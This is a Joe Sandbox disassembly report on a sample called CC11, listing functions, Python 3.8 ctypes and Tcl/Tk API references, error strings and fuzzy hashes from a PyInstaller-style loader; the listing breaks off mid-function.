Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-2007157414
Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction ID: 7648b33edeb82bdd0ab73a370428ccc24d8207c64474ae216970e21b1c2e257d
Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction Fuzzy Hash: DF12A465D0EB03F1FA7A9BB5A8509B423A1EF0C749B9414B5D80ED63A8EF3CF5489340

Function 00007FF690016EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF690016EB7
GetProcAddress.KERNEL32 ref: 00007FF690016EFD
GetProcAddress.KERNEL32 ref: 00007FF690016F22
GetProcAddress.KERNEL32 ref: 00007FF690016F47
GetProcAddress.KERNEL32 ref: 00007FF690016F6F
GetProcAddress.KERNEL32 ref: 00007FF690016F97
GetProcAddress.KERNEL32 ref: 00007FF690016FBF
GetProcAddress.KERNEL32 ref: 00007FF690016FE7
GetProcAddress.KERNEL32 ref: 00007FF69001700F

Strings

Tcl_ConditionFinalize, xrefs: 00007FF6900170CD, 00007FF6900170E9
Tcl_DoOneEvent, xrefs: 00007FF690016F3D, 00007FF690016F59
Tcl_ThreadAlert, xrefs: 00007FF69001716D, 00007FF690017189
Tcl_CreateObjCommand, xrefs: 00007FF6900171E5, 00007FF690017201
Tcl_EvalObjv, xrefs: 00007FF690017325, 00007FF690017341
Tcl_Finalize, xrefs: 00007FF690016F65, 00007FF690016F81
Failed to get address for %hs, xrefs: 00007FF690016ED0
Tcl_DeleteInterp, xrefs: 00007FF690016FB5, 00007FF690016FD1
Tcl_NewStringObj, xrefs: 00007FF690017235, 00007FF690017251
Tcl_Alloc, xrefs: 00007FF69001734D, 00007FF690017369
Tcl_ThreadQueueEvent, xrefs: 00007FF690017145, 00007FF690017161
Tcl_EvalEx, xrefs: 00007FF6900172FD, 00007FF690017319
Tcl_CreateInterp, xrefs: 00007FF690016EF3, 00007FF690016F0F
Tcl_Free, xrefs: 00007FF690017375, 00007FF690017391
Tcl_EvalFile, xrefs: 00007FF6900172D5, 00007FF6900172F1
Tk_Init, xrefs: 00007FF69001739D, 00007FF6900173B9
Tcl_FindExecutable, xrefs: 00007FF690016F18, 00007FF690016F34
Tcl_GetCurrentThread, xrefs: 00007FF690017005, 00007FF690017021
Tcl_SetVar2Ex, xrefs: 00007FF690017285, 00007FF6900172A1
Tcl_GetObjResult, xrefs: 00007FF6900172AD, 00007FF6900172C9
Tcl_ConditionWait, xrefs: 00007FF69001711D, 00007FF690017139
Tcl_CreateThread, xrefs: 00007FF690016FDD, 00007FF690016FF9
Tcl_SetVar2, xrefs: 00007FF6900171BD, 00007FF6900171D9
Tcl_MutexLock, xrefs: 00007FF690017055, 00007FF690017071
Tcl_FinalizeThread, xrefs: 00007FF690016F8D, 00007FF690016FA9
Tcl_MutexFinalize, xrefs: 00007FF6900170A5, 00007FF6900170C1
Tk_GetNumMainWindows, xrefs: 00007FF6900173C5, 00007FF6900173E1
Tcl_Init, xrefs: 00007FF690016EB0, 00007FF690016EC9
Tcl_GetString, xrefs: 00007FF69001720D, 00007FF690017229
Tcl_NewByteArrayObj, xrefs: 00007FF69001725D, 00007FF690017279
Tcl_JoinThread, xrefs: 00007FF69001702D, 00007FF690017049
Tcl_ConditionNotify, xrefs: 00007FF6900170F5, 00007FF690017111
Tcl_MutexUnlock, xrefs: 00007FF69001707D, 00007FF690017099
GetProcAddress, xrefs: 00007FF690016ED7
Tcl_GetVar2, xrefs: 00007FF690017195, 00007FF6900171B1

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-3427451314
Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction ID: 7c3918bf6be1ac06e90ac3ed181f4d6d5e203b6e854cd0e62e806de96d163347
Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction Fuzzy Hash: 54E1A96890DB03B1FA7AAB75B8505B523A5EF08758F9411B6D85EC23ACEF3CE558D300

Function 00007FF8BFB71A30 Relevance: 47.5, APIs: 19, Strings: 8, Instructions: 215stringCOMMON

Download Yara Rule

APIs

_PyObject_LookupAttrId.PYTHON38 ref: 00007FF8BFB71A80
PyUnicode_AsUTF8AndSize.PYTHON38 ref: 00007FF8BFB71AB8
strchr.VCRUNTIME140 ref: 00007FF8BFB71AE0
PyObject_CallObject.PYTHON38 ref: 00007FF8BFB71B0C

Part of subcall function 00007FF8BFB71DB0: PyMem_Malloc.PYTHON38 ref: 00007FF8BFB71DDC

PyDict_Update.PYTHON38 ref: 00007FF8BFB71B9C
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB71BBF
PyObject_SetAttrString.PYTHON38 ref: 00007FF8BFB71C7A
PyObject_SetAttrString.PYTHON38 ref: 00007FF8BFB71C8D
PyObject_SetAttrString.PYTHON38 ref: 00007FF8BFB71CA0
PyObject_SetAttrString.PYTHON38 ref: 00007FF8BFB71CB3
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB71CE1
PyErr_Format.PYTHON38 ref: 00007FF8BFB772F4
PyErr_Format.PYTHON38 ref: 00007FF8BFB77313
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB77324
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7733D
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7738D
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB773A6
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB773B5

Strings

__ctype_be__, xrefs: 00007FF8BFB71C6D, 00007FF8BFB71CA9
__ctype_le__, xrefs: 00007FF8BFB71C83, 00007FF8BFB71C96
cbBhHiIlLdfuzZqQPXOv?g, xrefs: 00007FF8BFB71AD9, 00007FF8BFB772E3
_type_ '%s' not supported, xrefs: 00007FF8BFB77306
class must define a '_type_' attribute which must bea single character string containing one of '%s'., xrefs: 00007FF8BFB772EA
class must define a '_type_' attribute which must be a string of length 1, xrefs: 00007FF8BFB772D0
class must define a '_type_' string attribute, xrefs: 00007FF8BFB77383
class must define a '_type_' attribute, xrefs: 00007FF8BFB772BD

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Object_$AttrDeallocString$Err_$Format$CallDict_LookupMallocMem_ObjectOccurredSizeUnicode_Updatestrchr
String ID: __ctype_be__$__ctype_le__$_type_ '%s' not supported$cbBhHiIlLdfuzZqQPXOv?g$class must define a '_type_' attribute$class must define a '_type_' attribute which must bea single character string containing one of '%s'.$class must define a '_type_' attribute which must be a string of length 1$class must define a '_type_' string attribute
API String ID: 1562115708-917751260
Opcode ID: 174102951eecfc0f4f4755dec21c1f3a16aa2c386703cc42a1da506657b2ea6b
Instruction ID: d734b905c0cf1aea86d02b9f8317fe62fbc108632f9ace003f84422e3e6e7129
Opcode Fuzzy Hash: 174102951eecfc0f4f4755dec21c1f3a16aa2c386703cc42a1da506657b2ea6b
Instruction Fuzzy Hash: 36A12A71A09B4281EA549FA9E8902B837A0FF85BD4F588135DF8E47765EF3CE496C310

Function 00007FF8BFB742C4 Relevance: 45.7, APIs: 19, Strings: 7, Instructions: 211COMMON

Download Yara Rule

APIs

_PyObject_LookupAttrId.PYTHON38 ref: 00007FF8BFB74305
_PyLong_Sign.PYTHON38 ref: 00007FF8BFB74334
PyLong_AsSsize_t.PYTHON38 ref: 00007FF8BFB74347
_PyObject_LookupAttrId.PYTHON38 ref: 00007FF8BFB74376
PyObject_CallObject.PYTHON38 ref: 00007FF8BFB74398

Part of subcall function 00007FF8BFB73610: PyMem_Malloc.PYTHON38 ref: 00007FF8BFB73650

PyMem_Malloc.PYTHON38 ref: 00007FF8BFB743F5
PyDict_Update.PYTHON38 ref: 00007FF8BFB7449C
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB744BF

Part of subcall function 00007FF8BFB74668: PyDescr_NewGetSet.PYTHON38 ref: 00007FF8BFB74695
Part of subcall function 00007FF8BFB74668: PyDict_SetItemString.PYTHON38 ref: 00007FF8BFB746AC

PyErr_SetString.PYTHON38 ref: 00007FF8BFB79180
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB79191
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB791AD
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB791C3
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB791CF
PyErr_ExceptionMatches.PYTHON38 ref: 00007FF8BFB791E8
PyErr_SetString.PYTHON38 ref: 00007FF8BFB79218
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7922C
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB79241
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB79254
PyErr_NoMemory.PYTHON38 ref: 00007FF8BFB79260

Strings

_type_ must have storage info, xrefs: 00007FF8BFB791FE
The '_length_' attribute must not be negative, xrefs: 00007FF8BFB791BA
array too large, xrefs: 00007FF8BFB7920E
class must define a '_length_' attribute, xrefs: 00007FF8BFB79156
The '_length_' attribute is too large, xrefs: 00007FF8BFB79176
class must define a '_type_' attribute, xrefs: 00007FF8BFB7915F
The '_length_' attribute must be an integer, xrefs: 00007FF8BFB7919E

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dealloc$Err_$Object_String$AttrDict_Long_LookupMallocMem_$CallDescr_ExceptionItemMatchesMemoryObjectOccurredSignSsize_tUpdate
String ID: The '_length_' attribute is too large$The '_length_' attribute must be an integer$The '_length_' attribute must not be negative$_type_ must have storage info$array too large$class must define a '_length_' attribute$class must define a '_type_' attribute
API String ID: 1094985414-504660705
Opcode ID: 618371b017bfb42e6c387fd73ed1a77009a15e34f6dbbb0f99ccff6f8b3ed9d2
Instruction ID: 1cc2590422f38699c30a79e7060a2033b72a207838e9d6d6c1ed8d98888d3b23
Opcode Fuzzy Hash: 618371b017bfb42e6c387fd73ed1a77009a15e34f6dbbb0f99ccff6f8b3ed9d2
Instruction Fuzzy Hash: 49A11921A0AB42D1FB54AFADD8942B937A4FF85BE4F184231DB1E466A5DF3CE495C300

Function 00007FF8BFB7A6D0 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

PyNumber_AsSsize_t.PYTHON38 ref: 00007FF8BFB7A713
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB7A722
PyNumber_AsSsize_t.PYTHON38 ref: 00007FF8BFB7A76F
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB7A77E
PyNumber_AsSsize_t.PYTHON38 ref: 00007FF8BFB7A7D2
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB7A7E1
PyNumber_AsSsize_t.PYTHON38 ref: 00007FF8BFB7A813
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB7A822
PyBytes_FromStringAndSize.PYTHON38 ref: 00007FF8BFB7A8A6
PyMem_Malloc.PYTHON38 ref: 00007FF8BFB7A8C3
PyErr_NoMemory.PYTHON38 ref: 00007FF8BFB7A8D1
PyBytes_FromStringAndSize.PYTHON38 ref: 00007FF8BFB7A8FC
PyMem_Free.PYTHON38 ref: 00007FF8BFB7A908
PyUnicode_New.PYTHON38 ref: 00007FF8BFB7A940
PyUnicode_FromWideChar.PYTHON38 ref: 00007FF8BFB7A958
PyMem_Malloc.PYTHON38 ref: 00007FF8BFB7A97A
PyUnicode_FromWideChar.PYTHON38 ref: 00007FF8BFB7A9B1
PyList_New.PYTHON38 ref: 00007FF8BFB7A9BF

Part of subcall function 00007FF8BFB7A518: PyErr_SetString.PYTHON38 ref: 00007FF8BFB7A541

PyErr_SetString.PYTHON38 ref: 00007FF8BFB7AA06

Strings

slice start is required for step < 0, xrefs: 00007FF8BFB7A7A2
slice stop is required, xrefs: 00007FF8BFB7A800
Pointer indices must be integer, xrefs: 00007FF8BFB7A9FC
slice step cannot be zero, xrefs: 00007FF8BFB7A7B0

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$FromNumber_OccurredSsize_tString$Mem_Unicode_$Bytes_CharMallocSizeWide$FreeList_Memory
String ID: Pointer indices must be integer$slice start is required for step < 0$slice step cannot be zero$slice stop is required
API String ID: 869507174-3059441807
Opcode ID: 70b66605ccd097e78c16a38ef12c19642d171d9870e87ce71708b90003173da8
Instruction ID: 5cbb4b5ce04246c051947a433738635de2deb1cf1a0f5f88263406dbd9a16d91
Opcode Fuzzy Hash: 70b66605ccd097e78c16a38ef12c19642d171d9870e87ce71708b90003173da8
Instruction Fuzzy Hash: EDA14021B0AA4281FE949F9DD544179ABA9BF94FE0F044631CB6E47BF6EE2CE455C300

Function 00007FF8BFB72010 Relevance: 40.4, APIs: 15, Strings: 8, Instructions: 167COMMON

Download Yara Rule

APIs

_PyArg_ParseTuple_SizeT.PYTHON38 ref: 00007FF8BFB7204C
PySequence_Tuple.PYTHON38 ref: 00007FF8BFB7206F
_PyArg_ParseTuple_SizeT.PYTHON38 ref: 00007FF8BFB720A0
PySys_Audit.PYTHON38 ref: 00007FF8BFB720D1
PyObject_GetAttrString.PYTHON38 ref: 00007FF8BFB720EA
PyLong_AsVoidPtr.PYTHON38 ref: 00007FF8BFB72113
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB72126
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB721F0
PyErr_SetString.PYTHON38 ref: 00007FF8BFB77596
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB775A6
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB775BE
PyErr_SetString.PYTHON38 ref: 00007FF8BFB775DB

Part of subcall function 00007FF8BFB71EEC: PyEval_SaveThread.PYTHON38 ref: 00007FF8BFB71F01
Part of subcall function 00007FF8BFB71EEC: GetProcAddress.KERNEL32 ref: 00007FF8BFB71F10
Part of subcall function 00007FF8BFB71EEC: PyEval_RestoreThread.PYTHON38 ref: 00007FF8BFB71F1C

_Py_Dealloc.PYTHON38 ref: 00007FF8BFB775EF
PyErr_Format.PYTHON38 ref: 00007FF8BFB7761B
PyErr_Format.PYTHON38 ref: 00007FF8BFB7762E

Strings

could not convert the _handle attribute to a pointer, xrefs: 00007FF8BFB775D1
_handle, xrefs: 00007FF8BFB720E3
O&O;illegal func_spec argument, xrefs: 00007FF8BFB72099
function '%s' not found, xrefs: 00007FF8BFB77614
O|O, xrefs: 00007FF8BFB72035
the _handle attribute of the second argument must be an integer, xrefs: 00007FF8BFB7758C
function ordinal %d not found, xrefs: 00007FF8BFB77627
ctypes.dlsym, xrefs: 00007FF8BFB720CA

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$Dealloc$String$Arg_Eval_FormatParseSizeThreadTuple_$AddressAttrAuditLong_Object_OccurredProcRestoreSaveSequence_Sys_TupleVoid
String ID: O&O;illegal func_spec argument$O|O$_handle$could not convert the _handle attribute to a pointer$ctypes.dlsym$function '%s' not found$function ordinal %d not found$the _handle attribute of the second argument must be an integer
API String ID: 247295482-1088195083
Opcode ID: c6efa2341e803b1a4695140a97f4be8c3672992cc7647cd23768f9356f60b82d
Instruction ID: bd2e1a358a6aa8da58e15c91bc0adb8943e5f539e85d0ae18838f67e93406474
Opcode Fuzzy Hash: c6efa2341e803b1a4695140a97f4be8c3672992cc7647cd23768f9356f60b82d
Instruction Fuzzy Hash: 0E71F621A0AA4284EB559FADD8501B83BA0FF84BD4F584536DF1E97BA9DF3CE445C310

Function 00007FF8BFB72CB0 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 127COMMON

Download Yara Rule

APIs

PyDict_GetItemWithError.PYTHON38 ref: 00007FF8BFB72CC0
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB72CD9
PyMem_Malloc.PYTHON38 ref: 00007FF8BFB72D1E
PyObject_CallFunction.PYTHON38 ref: 00007FF8BFB72D6C
PyMem_Free.PYTHON38 ref: 00007FF8BFB72D78
PyDict_SetItem.PYTHON38 ref: 00007FF8BFB72D93
PyUnicode_AsUTF8.PYTHON38 ref: 00007FF8BFB77ADD
PyMem_Malloc.PYTHON38 ref: 00007FF8BFB77B03
PyObject_CallFunction.PYTHON38 ref: 00007FF8BFB77B3B
PyMem_Free.PYTHON38 ref: 00007FF8BFB77B47
PyLong_FromVoidPtr.PYTHON38 ref: 00007FF8BFB77B59
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB77B78
PyErr_SetString.PYTHON38 ref: 00007FF8BFB77BD8

Strings

must be a ctypes type, xrefs: 00007FF8BFB77BCE
s(O){}, xrefs: 00007FF8BFB77B34
s(O){sO}, xrefs: 00007FF8BFB72D65
_type_, xrefs: 00007FF8BFB72D4A
LP_%s, xrefs: 00007FF8BFB72D34, 00007FF8BFB77B14

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Mem_$CallDict_Err_FreeFunctionItemMallocObject_$DeallocErrorFromLong_OccurredStringUnicode_VoidWith
String ID: LP_%s$_type_$must be a ctypes type$s(O){sO}$s(O){}
API String ID: 2461613936-2311978994
Opcode ID: b2117b3c44d5f46dd7f24c4b35abf2caf2fa320c46810db12cf49d07f67c91ee
Instruction ID: b4ad54673fc8b1d8172b9d38bc554e71d6cc1d4556a3572efe2a1530a3bc00d7
Opcode Fuzzy Hash: b2117b3c44d5f46dd7f24c4b35abf2caf2fa320c46810db12cf49d07f67c91ee
Instruction Fuzzy Hash: 99513725E0EB0385FB159FADA9541B827A4AF86BE0F180635CB1E07BA6DF3CE444C310

Function 00007FF8BFB79A50 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

PyNumber_AsSsize_t.PYTHON38 ref: 00007FF8BFB79A8D
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB79A9C
PySlice_Unpack.PYTHON38 ref: 00007FF8BFB79AE1
PySlice_AdjustIndices.PYTHON38 ref: 00007FF8BFB79AFF
PyBytes_FromStringAndSize.PYTHON38 ref: 00007FF8BFB79B48
PyMem_Malloc.PYTHON38 ref: 00007FF8BFB79B69
PyErr_NoMemory.PYTHON38 ref: 00007FF8BFB79B77
PyBytes_FromStringAndSize.PYTHON38 ref: 00007FF8BFB79BA4
PyMem_Free.PYTHON38 ref: 00007FF8BFB79BB0

Strings

indices must be integers, xrefs: 00007FF8BFB79CC3

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Bytes_Err_FromMem_SizeSlice_String$AdjustFreeIndicesMallocMemoryNumber_OccurredSsize_tUnpack
String ID: indices must be integers
API String ID: 1902650389-2024404580
Opcode ID: 56fc218e470cc9290087d7e1a0b697a8edda5b0b6fe3fe085914f497f61d90d4
Instruction ID: 0d280810565aaea33e96bd87a941ce62fe38f1e2b184a0ebf69715ad7d4b60bf
Opcode Fuzzy Hash: 56fc218e470cc9290087d7e1a0b697a8edda5b0b6fe3fe085914f497f61d90d4
Instruction Fuzzy Hash: 96715C26A0AA4681EF199FAED9441B86BB1FF84FE4B144131DF1E47BA9DE3DE445C300

Function 00007FF8BFB8022C Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 151COMMON

Download Yara Rule

APIs

PyObject_GetAttrString.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB8025F
PySequence_Fast.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB8027B
_Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB8028D
PyArg_ParseTuple.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB802E6
PyObject_GetAttr.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB802FD
_Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB8034A
_Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB803B6
PyObject_SetAttr.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB803C7
_Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB803DB
_Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB803F2
_Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB8040C
_Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB8041B
PyErr_SetString.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB80453
_Py_Dealloc.PYTHON38(?,?,00000000,?,00000000,00000000,00000000,00007FF8BFB79018), ref: 00007FF8BFB80464

Strings

_fields_, xrefs: 00007FF8BFB8024E
_fields_ must be a sequence, xrefs: 00007FF8BFB80271
OO|O, xrefs: 00007FF8BFB802DF
unexpected type, xrefs: 00007FF8BFB80449

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dealloc$AttrObject_$String$Arg_Err_FastParseSequence_Tuple
String ID: OO|O$_fields_$_fields_ must be a sequence$unexpected type
API String ID: 1182381414-2418103425
Opcode ID: bf701b0b9c5246edb51d4daac37b77ce33a136e741e7a5e3015aa40b30222fbb
Instruction ID: 4c2016ebb4e180f2877a9ac0d317201ff051b482223752d05383363809cb6e89
Opcode Fuzzy Hash: bf701b0b9c5246edb51d4daac37b77ce33a136e741e7a5e3015aa40b30222fbb
Instruction Fuzzy Hash: 0061F932A09A0682EE549FAEE9441B973A0FB89BD4B084135DF5E43B66DF3CE455C300

Function 00007FF8BFB7DC1C Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

PyUnicode_FromFormatV.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DC41
PyErr_Fetch.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DC60
PyErr_NormalizeException.PYTHON38(?,?,?,?,?,?,?,?,00007FF8BFB78864), ref: 00007FF8BFB7DC72
